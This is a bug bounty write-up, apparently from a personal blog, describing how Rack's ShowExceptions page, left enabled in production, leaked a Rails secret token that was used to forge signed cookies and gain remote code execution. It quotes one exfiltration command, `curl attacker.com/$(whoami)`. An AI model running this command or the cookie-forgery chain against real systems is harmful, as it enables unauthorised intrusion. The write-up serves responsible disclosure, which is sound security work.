RCE due to showexceptions

sites.google.com · devanshbatham/Awesome-Bugbounty-Writeups · 4 hours ago · bug-bounty
0 net
AI Summary

An RCE vulnerability was discovered via Rack's ShowExceptions middleware being enabled in production, which leaked the Rails secret token used to sign cookies. The attacker used this token to forge authenticated cookies and execute arbitrary commands on the server.

Tags
remote-code-execution rce rails rack exception-handling information-disclosure secret-token signed-cookies debug-mode showexceptions parameter-fuzzing cookie-forgery bug-bounty
Entities
Rack Rails ShowExceptions action_dispatch.secret_token secret_token.rb robertheaton.com
RCE due to ShowExceptions Search this site Embedded Files Skip to main content Skip to navigation RCE due to ShowExceptions Hey guys, First of all a good news, I'm starting to blog my findings again, I have few posts ready just waiting for confirmation from companies to make them public. Getting Started So a few days back i started testing a private BB program, I found a straightforward RCE on it. I choose'd to start hunting on the main web app i.e. https://app.redacted.com , While going through i found an endpoint which downloads a CSV report via redacted.redacted.com (In-scope asset). The filename and its content was defined in the request it self, Something happened I was fuzzing around parameters, When i passed %0d to file_name the server threw an exception, The exception thrown because Rack's ShowExceptions was on. It's more than something As the the Rack's page suggests, "Be careful when you use this on public-facing sites as it could reveal information helpful to attackers", This must not be turned on on production environment. Rails (up to v4.0.2 NOT SURE) had a Secret token in /config/initializers/secret_token.rb. This token is used to verify the integrity of signed cookies (Any cookie set by your rails application is signed using this token), From Rails 4.0.2 this token is kept as environment variable `action_dispact.secret_token`. The exceptions page also leaks or better say includes this too. This token can be used to get RCE ( https://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/ ) You can read about this on the given link to understand and know how this works. I quickly used the above code to generate a cookie to execute `curl attacker.com/$(whoami)` and got an request to attacker.com/app. This RCE was applicable for both https://app.redacted.com/ and https://redacted.redacted.com/ because both shared same rails app. That's all folks :) Share/Retweet is much appreciated. Doubt? DM me at @rootxharsh Timeline 16 July : Bug found and Reported 16 July : Triaged 18 July : Fixed 20 July : $5000 Rewarded Google Sites Report abuse Page details Page updated Google Sites Report abuse This site uses cookies from Google to deliver its services and to analyze traffic. Information about your use of this site is shared with Google. By using this site, you agree to its use of cookies. Learn more Got it
← Back to stories